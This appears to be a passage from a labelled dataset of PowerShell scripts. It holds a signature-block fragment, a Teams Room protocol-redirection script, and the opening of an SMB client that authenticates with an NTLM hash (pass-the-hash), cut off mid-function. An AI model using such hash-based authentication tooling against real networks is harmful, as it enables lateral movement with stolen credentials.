MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjJBMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # tD1MH3yAHWHNVslC+CBTj/Mpd55LDPtQrhN7WeqFhReC9xKXSjobW1ZHzHU8V2BO # JUiYg7fDJ2AxGVGyovUtgGZg2+GauFKk3ZjjsLSsqehYIsUQrgX+r/VATaW8/ONW # y6lOyGZwZpxfV2EX4qAh6mb2hadAuvdbRl1QK1tfBlR3fdeCBQG+ybz9JFZ45LN2 # ps8Nc1xr41N8Qi3KVJLYX0ibEbAkksR4bbszCzvY+vdSrjWyKAjR6YgYhaBaDxE2 # KDJ2sQRFFF/egCxKgogdF3VIJoCE/Wuy9MuEgypea1Hei7lFGvdLQZH5Jo2QR5uN # 8hiMc8Z47RRJuIWCOeyIJ1YnRiiibpUZ72+wpv8LTov0yH6C5HR/D8+AT4vqtP57 # ITXsD9DPOob8tjtsefPcQJebUNiqyfyTL5j5/J+2d+GPCcXEYoeWZ+nrsZSfrd5D # HM4ovCmD3lifgYnzjOry4ghQT/cvmdHwFr6yJGphW/HG8GQd+cB4w7wGpOhHVJby # 44kGVK8MzY9s32Dy1THnJg8p7y1sEGz/A1y84Zt6gIsITYaccHhBKp4cOVNrfoRV # Ux2G/0Tr7Dk3fpCU8u+5olqPPwKgZs57jl+lOrRVsX1AYEmAnyCyGrqRAzpGXyk1 # HvNIBpSNNuTBQk7FBvu+Ypi6A7S2V2Tj6lzYWVBvuGECAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBSJ7aO6nJXJI9eijzS5QkR2RlngADAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAZiAJgFbkf7jfhx/mmZlnGZrpae+HGpxWxs8I79vUb8GQou50M1ns7iwG # 2CcdoXaq7VgpVkNf1uvIhrGYpKCBXQ+SaJ2O0BvwuJR7UsgTaKN0j/yf3fpHD0kt # H+EkEuGXs9DBLyt71iutVkwow9iQmSk4oIK8S8ArNGpSOzeuu9TdJjBjsasmuJ+2 # q5TjmrgEKyPe3TApAio8cdw/b1cBAmjtI7tpNYV5PyRI3K1NhuDgfEj5kynGF/ui # zP1NuHSxF/V1ks/2tCEoriicM4k1PJTTA0TCjNbkpmBcsAMlxTzBnWsqnBCt9d+U # d9Va3Iw9Bs4ccrkgBjLtg3vYGYar615ofYtU+dup+LuU0d2wBDEG1nhSWHaO+u2y # 6Si3AaNINt/pOMKU6l4AW0uDWUH39OHH3EqFHtTssZXaDOjtyRgbqMGmkf8KI3qI # VBZJ2XQpnhEuRbh+AgpmRn/a410Dk7VtPg2uC422WLC8H8IVk/FeoiSS4vFodhnc # FetJ0ZK36wxAa3FiPgBebRWyVtZ763qDDzxDb0mB6HL9HEfTbN+4oHCkZa1HKl8B # 0s8RiFBMf/W7+O7EPZ+wMH8wdkjZ7SbsddtdRgRARqR8IFPWurQ+sn7ftEifaojz # uCEahSAcq86yjwQeTPN9YG9b34RTurnkpD+wPGTB1WccMpsLlM0wggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjoyQTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAqs5WjWO7zVAK # mIcdwhqgZvyp6UaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJyZcwIhgPMjAyNDEwMjgwODI4MDdaGA8yMDI0 # MTAyOTA4MjgwN1owdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6snJlwIBADAHAgEA # AgIIXjAHAgEAAgITcTAKAgUA6ssbFwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor # BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA # A4IBAQAZdq+OU23EaUchwQu035tSDnKZla9uDo94iOGMUfYSHoIxASsf3js2Dewx # IzsFz1t8ELbs/7V+b+lLZ25UDy5WhMuAaUF0DBK6D2JnsjyJVSbcc+48j6Z/7Fh8 # 4y9kT8c5HUYL5kF2NJiqgHKNRTLdZqHB42I4bV/fz8/Dm/29GW+DR2IGYSsvL2e7 # 2AvfpKtUZO94WfnvRVAu4KwHlImGRd30JUiW0qFBDvmA12wAg8FJ/+mk6nhJjEpU # qnrIVhOqTZE0I5GJiVJydAFpWGQeNwWigEbM5AlvSrgyoQMhnagRV/BHhjphFgGE # u6OFzH+g6bBiUu/BsmlodM49zQAgMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAH5H2eNdauk8bEAAQAAAfkwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQg6IFLFIg1ss4n+T3auTOo+9v5OlnMMNAVWVfBH+fOLLEwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCA5I4zIHvCN+2T66RUOLCZrUEVdoKlKl8VeCO5S # bGLYEDCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # +R9njXWrpPGxAAEAAAH5MCIEICZrvjThT7ljhfyqrm1E5STdGnS3QHMrZ/lFHJkH # B7rdMA0GCSqGSIb3DQEBCwUABIICALIsTp+pACjrAEXQDlo6shWlj8RBcaqAtZCJ # fcrf6uEuEvulCvpMef05or4OwCII4UH2E1mOvJ2t28VTKGsEGiSFuyKXEwoooaNQ # 4cYObD3+EJyJ7T0uhXV2B+bZ7ZFc+NXW/Rzr90NqNlGjc4fAwNV95JYMY/7az+Bp # /eYpa8Iha7REUfi0TarrpD4MRz5w40God1WVf7S4naFY905ksXic4vxbKAdR5qXp # TKo+uEp91Hfb/9QoaGLMAftixcXCNmQj4kinVq18ObjQ0/7v23rbisXnoq4eLslx # dc5dV53iutqYJdeZrVwwk3QOEN5UjLqmu57cVJE5UTrQGi/R0DMNTVlxqtdBBIiD # le7WDvKtrcWbv8gp0L9+llW/eLwBW4WWEVZmF3FVePoLjKq/umDypRV60swJyB9R # ga68wlnDW2P6+GcGA5EZsW13nP+KgN5YHZEEZCiOTdEsvfMkYsLLgiY57GP6+Gnq # azmHA5KJ2Gm5U4SzW4fqUzHE8QzR+drmVu3WfXK5ylV6y/zqRa6/ksd/yNda8t0x # qRn9wDgKiGXlcYTDwN2QoEmdMxBra5oyhSEynBkcE6fEGHAjTxM7OJ4AumyFATGw # uY2X99wctviV9UEtNvBo3GDoJuE30jryeogBUW+mjnIAPreyqFMqScdsHr36motK # FNykWZGa # SIG # End signature block
combined_dataset/train/non-malicious/sample_49_21.ps1
sample_49_21.ps1
using module ..\..\Config.psm1 param( [switch]$TestStatus ) if ($TestStatus) { return [string]([ApplyResult]::FailurePowerShellException) } Import-Module (Join-Path $PSScriptRoot "..\..\Events.psm1") # Note: PS-SFTA folder nameming contains the commit number from: https://github.com/DanysysTeam/PS-SFTA/ Import-Module (Join-Path $PSScriptRoot "PS-SFTA-7688ec441c250e53ebeb07a5125ed535b1eacb9e\SFTA.ps1") Set-Variable -Option Constant -Name HKLMConfigPath -Value "HKLM:\SOFTWARE\Microsoft\SkypeRoomSystem\Config" Set-Variable -Option Constant -Name DisableLinkOverride -Value "DisableLinkOverride" if (!(Test-Path $HKLMConfigPath)) { Write-EventLogTemplate $EVLRedirectProtocolSkypeContextWarning @("$HKLMConfigPath does not exist yet") return [string]([ApplyResult]::NoOpHasRun) } if ((Get-Item $HKLMConfigPath).GetValue("DisableLinkOverride") -eq 1) { Write-EventLogTemplate $EVLRedirectProtocolSkypeContextWarning @("http/https/microsoft-edge did not get redirected to $TeamsProgId. $HKLMConfigPath\DisableLinkOverride is set.") return [string]([ApplyResult]::NoOpHasRun) } Set-Variable -Option Constant -Name TeamsProgId -Value "TeamsLinkOverride" New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR *> Out-Null if (Test-Path "HKCR:\$TeamsProgId") { Write-EventLogTemplate $EVLRedirectProtocolSkypeContext @("HKCR:\$TeamsProgId exists. Proceeding with protocol redirection...") Set-PTA TeamsLinkOverride http Write-EventLogTemplate $EVLRedirectProtocolSkypeContext @("http protocol has been redirected to $TeamsProgId") Set-PTA TeamsLinkOverride https Write-EventLogTemplate $EVLRedirectProtocolSkypeContext @("https protocol has been redirected to $TeamsProgId") Set-PTA TeamsLinkOverride microsoft-edge Write-EventLogTemplate $EVLRedirectProtocolSkypeContext @("microsoft-edge protocol has been redirected to $TeamsProgId") } else { Write-EventLogTemplate $EVLRedirectProtocolSkypeContextWarning @("http/https/microsoft-edge did not get redirected to $TeamsProgId. HKCR:\$TeamsProgId has not been created yet.") } return [string]([ApplyResult]::Success)
combined_dataset/train/non-malicious/4248.ps1
4248.ps1
function Invoke-SMBClient { [CmdletBinding(DefaultParametersetName='Default')] param ( [parameter(Mandatory=$false)][ValidateSet("List","Recurse","Get","Put","Delete")][String]$Action = "List", [parameter(Mandatory=$false)][String]$Destination, [parameter(ParameterSetName='Auth',Mandatory=$true)][String]$Username, [parameter(ParameterSetName='Auth',Mandatory=$false)][String]$Domain, [parameter(Mandatory=$true)][Object]$Source, [parameter(ParameterSetName='Auth',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Switch]$Modify, [parameter(Mandatory=$false)][Switch]$NoProgress, [parameter(Mandatory=$false)][ValidateSet("Auto","1","2.1")][String]$Version="Auto", [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh, [parameter(Mandatory=$false)][Int]$Sleep=100 ) if($Version -eq '1') { $SMB_version = 'SMB1' } elseif($Version -eq '2.1') { $SMB_version = 'SMB2.1' } if($PsCmdlet.ParameterSetName -ne 'Auth' -and $PsCmdlet.ParameterSetName -ne 'Session') { $signing_check = $true } function ConvertFrom-PacketOrderedDictionary { param($ordered_dictionary) ForEach($field in $ordered_dictionary.Values) { $byte_array += $field } return $byte_array } function New-PacketNetBIOSSessionService { param([Int]$HeaderLength,[Int]$DataLength) [Byte[]]$length = ([System.BitConverter]::GetBytes($HeaderLength + $DataLength))[2..0] $NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary $NetBIOSSessionService.Add("MessageType",[Byte[]](0x00)) $NetBIOSSessionService.Add("Length",$length) return $NetBIOSSessionService } function New-PacketSMBHeader { param([Byte[]]$Command,[Byte[]]$Flags,[Byte[]]$Flags2,[Byte[]]$TreeID,[Byte[]]$ProcessID,[Byte[]]$UserID) $ProcessID = $ProcessID[0,1] $SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $SMBHeader.Add("Command",$Command) $SMBHeader.Add("ErrorClass",[Byte[]](0x00)) $SMBHeader.Add("Reserved",[Byte[]](0x00)) $SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00)) $SMBHeader.Add("Flags",$Flags) $SMBHeader.Add("Flags2",$Flags2) $SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00)) $SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00)) $SMBHeader.Add("TreeID",$TreeID) $SMBHeader.Add("ProcessID",$ProcessID) $SMBHeader.Add("UserID",$UserID) $SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00)) return $SMBHeader } function New-PacketSMBNegotiateProtocolRequest { param([String]$Version) if($version -eq 'SMB1') { [Byte[]]$byte_count = 0x0c,0x00 } else { [Byte[]]$byte_count = 0x22,0x00 } $SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00)) $SMBNegotiateProtocolRequest.Add("ByteCount",$byte_count) $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02)) $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)) if($version -ne 'SMB1') { $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02)) $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00)) $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02)) $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00)) } return $SMBNegotiateProtocolRequest } function New-PacketSMBSessionSetupAndXRequest { param([Byte[]]$SecurityBlob) [Byte[]]$byte_count = [System.BitConverter]::GetBytes($SecurityBlob.Length)[0,1] [Byte[]]$security_blob_length = [System.BitConverter]::GetBytes($SecurityBlob.Length + 5)[0,1] $SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMBSessionSetupAndXRequest.Add("WordCount",[Byte[]](0x0c)) $SMBSessionSetupAndXRequest.Add("AndXCommand",[Byte[]](0xff)) $SMBSessionSetupAndXRequest.Add("Reserved",[Byte[]](0x00)) $SMBSessionSetupAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00)) $SMBSessionSetupAndXRequest.Add("MaxBuffer",[Byte[]](0xff,0xff)) $SMBSessionSetupAndXRequest.Add("MaxMpxCount",[Byte[]](0x02,0x00)) $SMBSessionSetupAndXRequest.Add("VCNumber",[Byte[]](0x01,0x00)) $SMBSessionSetupAndXRequest.Add("SessionKey",[Byte[]](0x00,0x00,0x00,0x00)) $SMBSessionSetupAndXRequest.Add("SecurityBlobLength",$byte_count) $SMBSessionSetupAndXRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $SMBSessionSetupAndXRequest.Add("Capabilities",[Byte[]](0x44,0x00,0x00,0x80)) $SMBSessionSetupAndXRequest.Add("ByteCount",$security_blob_length) $SMBSessionSetupAndXRequest.Add("SecurityBlob",$SecurityBlob) $SMBSessionSetupAndXRequest.Add("NativeOS",[Byte[]](0x00,0x00,0x00)) $SMBSessionSetupAndXRequest.Add("NativeLANManage",[Byte[]](0x00,0x00)) return $SMBSessionSetupAndXRequest } function New-PacketSMB2Header { param([Byte[]]$Command,[Byte[]]$CreditRequest,[Bool]$Signing,[Int]$MessageID,[Byte[]]$ProcessID,[Byte[]]$TreeID,[Byte[]]$SessionID) if($Signing) { $flags = 0x08,0x00,0x00,0x00 } else { $flags = 0x00,0x00,0x00,0x00 } [Byte[]]$message_ID = [System.BitConverter]::GetBytes($MessageID) if($message_ID.Length -eq 4) { $message_ID += 0x00,0x00,0x00,0x00 } $SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary $SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) $SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00)) $SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00)) $SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00)) $SMB2Header.Add("Reserved",[Byte[]](0x00,0x00)) $SMB2Header.Add("Command",$Command) $SMB2Header.Add("CreditRequest",$CreditRequest) $SMB2Header.Add("Flags",$flags) $SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2Header.Add("MessageID",$message_ID) $SMB2Header.Add("ProcessID",$ProcessID) $SMB2Header.Add("TreeID",$TreeID) $SMB2Header.Add("SessionID",$SessionID) $SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) return $SMB2Header } function New-PacketSMB2NegotiateProtocolRequest { $SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00)) $SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00)) $SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00)) $SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00)) $SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02)) $SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02)) return $SMB2NegotiateProtocolRequest } function New-PacketSMB2SessionSetupRequest { param([Byte[]]$SecurityBlob) [Byte[]]$security_buffer_length = ([System.BitConverter]::GetBytes($SecurityBlob.Length))[0,1] $SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00)) $SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00)) $SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01)) $SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00)) $SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00)) $SMB2SessionSetupRequest.Add("SecurityBufferLength",$security_buffer_length) $SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $SMB2SessionSetupRequest.Add("Buffer",$SecurityBlob) return $SMB2SessionSetupRequest } function New-PacketSMB2TreeConnectRequest { param([Byte[]]$Buffer) [Byte[]]$path_length = ([System.BitConverter]::GetBytes($Buffer.Length))[0,1] $SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00)) $SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00)) $SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00)) $SMB2TreeConnectRequest.Add("PathLength",$path_length) $SMB2TreeConnectRequest.Add("Buffer",$Buffer) return $SMB2TreeConnectRequest } function New-PacketSMB2CreateRequest { param([Byte[]]$FileName,[Int]$ExtraInfo,[Int64]$AllocationSize) if($FileName) { $file_name_length = [System.BitConverter]::GetBytes($FileName.Length)[0,1] } else { $FileName = 0x00,0x00,0x69,0x00,0x6e,0x00,0x64,0x00 $file_name_length = 0x00,0x00 } if($ExtraInfo) { [Byte[]]$desired_access = 0x80,0x00,0x10,0x00 [Byte[]]$file_attributes = 0x00,0x00,0x00,0x00 [Byte[]]$share_access = 0x00,0x00,0x00,0x00 [Byte[]]$create_options = 0x21,0x00,0x00,0x00 [Byte[]]$create_contexts_offset = [System.BitConverter]::GetBytes($FileName.Length) if($ExtraInfo -eq 1) { [Byte[]]$create_contexts_length = 0x58,0x00,0x00,0x00 } elseif($ExtraInfo -eq 2) { [Byte[]]$create_contexts_length = 0x90,0x00,0x00,0x00 } else { [Byte[]]$create_contexts_length = 0xb0,0x00,0x00,0x00 [Byte[]]$allocation_size_bytes = [System.BitConverter]::GetBytes($AllocationSize) } if($FileName) { [String]$file_name_padding_check = $FileName.Length / 8 if($file_name_padding_check -like "*.75") { $FileName += 0x04,0x00 } elseif($file_name_padding_check -like "*.5") { $FileName += 0x00,0x00,0x00,0x00 } elseif($file_name_padding_check -like "*.25") { $FileName += 0x00,0x00,0x00,0x00,0x00,0x00 } } [Byte[]]$create_contexts_offset = [System.BitConverter]::GetBytes($FileName.Length + 120) } else { [Byte[]]$desired_access = 0x03,0x00,0x00,0x00 [Byte[]]$file_attributes = 0x80,0x00,0x00,0x00 [Byte[]]$share_access = 0x01,0x00,0x00,0x00 [Byte[]]$create_options = 0x40,0x00,0x00,0x00 [Byte[]]$create_contexts_offset = 0x00,0x00,0x00,0x00 [Byte[]]$create_contexts_length = 0x00,0x00,0x00,0x00 } [String]$lease_key = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) [Byte[]]$lease_key = $lease_key.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $SMB2CreateRequest = New-Object System.Collections.Specialized.OrderedDictionary $SMB2CreateRequest.Add("StructureSize",[Byte[]](0x39,0x00)) $SMB2CreateRequest.Add("Flags",[Byte[]](0x00)) $SMB2CreateRequest.Add("RequestedOplockLevel",[Byte[]](0x00)) $SMB2CreateRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) $SMB2CreateRequest.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $SMB2CreateRequest.Add("DesiredAccess",$desired_access) $SMB2CreateRequest.Add("FileAttributes",$file_attributes) $SMB2CreateRequest.Add("ShareAccess",$share_access) $SMB2CreateRequest.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00)) $SMB2CreateRequest.Add("CreateOptions",$create_options) $SMB2CreateRequest.Add("NameOffset",[Byte[]](0x78,0x00)) $SMB2CreateRequest.Add("NameLength",$file_name_length) $SMB2CreateRequest.Add("CreateContextsOffset",$create_contexts_offset) $SMB2CreateRequest.Add("CreateContextsLength",$create_contexts_length) $SMB2CreateRequest.Add("Buffer",$FileName) if($ExtraInfo) { $SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_ChainOffset",[Byte[]](0x28,0x00,0x00,0x00)) 